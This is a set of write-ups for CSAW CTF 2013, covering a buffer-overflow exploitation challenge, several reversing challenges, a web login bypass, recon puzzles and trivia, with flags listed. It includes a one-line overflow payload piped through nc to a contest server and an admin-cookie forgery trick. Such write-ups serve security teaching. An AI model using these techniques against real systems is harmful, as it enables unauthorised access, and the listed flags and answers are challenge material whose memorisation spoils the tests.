CSAW CTF 2013 - Exploitation100

Exploitation 1 - 100 Points
exploit1
exploit1.c

We were give an elf32 executable and its code snippet of its handle() function in this challenge:

Our objective is to change the backdoor value to 1, so that the key to this challenge will be read and sent back to us.

buffer[] array is defined to have size of 1016. However in recv(), it is shown that 1020-byte of data will be copied into buffer[], classic case of buffer overflow. So we did what came naturally:

$ python -c "print 'A'*1020" | nc 128.238.66.212 31337

Voila!

CSAW CTF 2013 - Reversing200 (CSAW Reversing 2013 2)

CSAW Reversing 2013 2 - 200 Points

csaw2013reversing2.exe

Yet another win32 executable. Let's run it, annnnd it's crashed :/
Load it in olly, you should see:

A decryption loop!

Right after the decryption loop where the flag will be shown in a message box, the flag text is actually stored in ESI, so let's dump the value of ESI while we are in the decryption loop:

Flag: number2isalittlebitharder:p

CSAW CTF 2013 - Reversing100 (CSAW Reversing 2013 1)

CSAW Reversing 2013 1 - 100 Points

csaw2013reversing1.exe

We were given a win32 executable in this challenge, let's run it:

Oops... Let's load it in a debugger

So, there is this call to IsDebuggerPresent that causes the display of junk instead of the flag.

Flag: this1isprettyeasy:)

CSAW CTF 2013 - Reversing100 (DotNet)

DotNet - 100 Points

DotNetReversing.exe

DotNet is a .Net executables. Let's decompile the executable:

To solve this challenge, one must get the correct value of num in order to get the value of num3=6553563335L. XOR, as we know it, is reversible, so:

num ^ num2 = num3

We can get the value of num by performing:

num = num3 ^ num2

num = 13371337255

Now we run the executable with 13371337255 as the argument:

Flag: I'll create a GUI interface using visual basic...see if I can track an IP address.

CSAW CTF 2013 - Web100

Guess Harder - 100 Points

http://128.238.66.215

The url gave us a login page. The objective of this challenge was to login as admin. By using Burp proxy (or any cookie editor), something interesting showed up:

This challenge can be solved by setting the admin cookie to true, as shown above. And... voila!

Flag: told_ya_you_wouldnt_guess_it

CSAW CTF 2013 - Recon

There were 8 recon challenges. 6 of them were solved with the exception of Alexander Taylor (fuzyll) and Jordan Wiens (psifertex). Most of recon challenges were solved with the assistance of Tommy. Each challenge in this category worths 100 points.

Julian Cohen

> Google his handle (HockeyInJune)
> Click on Wikipedia user page

> Visit his "new website", there was nothing except picture of a washing machine with big mouth
> Run 'dig' on the url, and get the IP address.

>] Voila!

Flag: 1a8024a820bdc7b31b79a2d3a9ae7c02



Kevin Chung

> Hint given was "What places can you graduate from?"
> Start with his high school, Staten Island Technical High School
> First few Google results were about CSAW High School Forensics previous winners
> Clicking on Kevin's name brings us to key.txt

Flag: who_in_the_world_is_kevin_chung


historypeats

> Google "historypeats" gives multiple results, including a github profile
> It is shown that the most recent activity of historypeats was removing comments from historypeats/putscan
> Removed comment was actually the flag

Flag: whatDidtheF0xSay?

CSAW CTF 2013 - Trivia

There were 5 trivia questions, each flag gives 50 points:

#1 - Drink all the booze, ____ all the things!

Flag: hack

#2 - What is the abbreviation of the research published in the Hackin9 issue on nmap by Jon Oberheide, Nico Waisman, Matthieu Suiche, Chris Valasek, Yarochkin Fyodor, the Grugq, Jonathan Brossard, and Mark Dowd?

Flag: DICKS

#3 - What is the common name for a single grouping of instructions used in a Return Oriented Programming payload, typically ending in a return (ret) instruction?

Flag: gadget

#4 - What is the new web technology that provides a web browser full-duplex communication to a web server over a single connection?

Flag: websocket

#5 - What is the x86 processor operating mode for running 64-bit code?

Flag: long mode